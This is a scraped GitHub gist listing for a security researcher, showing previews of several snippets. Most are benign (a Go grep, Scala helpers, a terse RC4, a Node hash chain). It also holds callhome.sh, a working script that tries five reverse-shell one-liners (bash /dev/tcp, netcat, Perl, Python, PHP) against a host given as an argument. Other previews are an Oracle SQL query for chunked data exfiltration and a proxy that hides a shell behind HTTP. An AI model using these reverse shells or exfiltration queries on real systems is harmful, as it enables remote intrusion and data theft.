Skip to content

Instantly share code, notes, and snippets.

Chris Frohoff frohoff

  • San Diego, CA
Block or report user

Report or block frohoff

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View oracle_chunked_xml_exfil.sql
select c from (
select cast(dbms_lob.substr(t.c, 4000, (n.i) * 4000 + 1) as varchar(4000)) c, t.r i, n.i j
from ((
select rownum r, dbms_lob.getlength(c) l, c
from (
select dbms_xmlgen.getxml('select * from all_tables') c
from dual)
) t inner join (
select rownum - 1 as i
from dual
@frohoff
frohoff / print_rails_cookie.sh
Last active Dec 15, 2015
print contents of rails cookie
View print_rails_cookie.sh
View rails_cookie_rce.rb
@frohoff
frohoff / callhome.sh
Last active Oct 27, 2018
Shell script that attempts multiple methods for creating a reverse shell
View callhome.sh
#!/bin/bash
host=$1
port=$2
bash -i >& /dev/tcp/$host/$port 0>&1
nc -e /bin/sh $host $port
perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
View hide-shell.rb
proxy do |data|
{ :remote =>
data =~ /(GET|POST|HEAD|PUT|DELETE|OPTIONS|TRACE|CONNECT|PATCH) / ?
"localhost:81" :
"localhost:4444"
}
end
View gogrep.go
package main
import (
"fmt"
"os"
"bufio"
"regexp"
"io"
)
@frohoff
frohoff / longchaintest.js
Last active Aug 29, 2015
long stream chain test
View longchaintest.js
var crypto = require('crypto')
var hashType = process.argv[2] || 'sha1'
var numHashes = parseInt(process.argv[3] || 1)
// init chain with stdout
var piped = process.stdout
for (var i = 0; i < numHashes; i++) {
// prepend chain with new hash
View nullsafe.scala
object NullSafeConversions {
implicit def ns[A](a:A) = new NullSafe(a)
implicit def ro[A](o:Option[A]) = new RichOption(o)
def ?[A](a:A) = if (a == null) Some(a) else None
case class NullSafe[A](a:A) extends AnyVal {
def ?[B >: Null](f: A => B):B = if (a != null) f(a) else null
}
case class RichOption[A](o:Option[A]) extends AnyVal {
@frohoff
frohoff / terse-rc4.rb
Last active Aug 29, 2015
terse ruby rc4 (161 chars, 154 chars not counting proc/param overhead) for https://twitter.com/matthew_d_green/status/524966294492577792
View terse-rc4.rb
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}
@frohoff
frohoff / Flow.scala
Last active Aug 29, 2015
monadish reactive flow combinators
View Flow.scala
package org.frohoff.flow
import scala.collection.mutable.Buffer
import Flow._
object Test extends App {
val f: Flow[Int,Int] = Flow[Int]
val f2: Flow[Int,String] = f.map(_.toHexString)
val f3: Flow[Int,Option[Int]] = f.map(Option(_))
//f3.flatten // doesn't compile yet
You can’t perform that action at this time.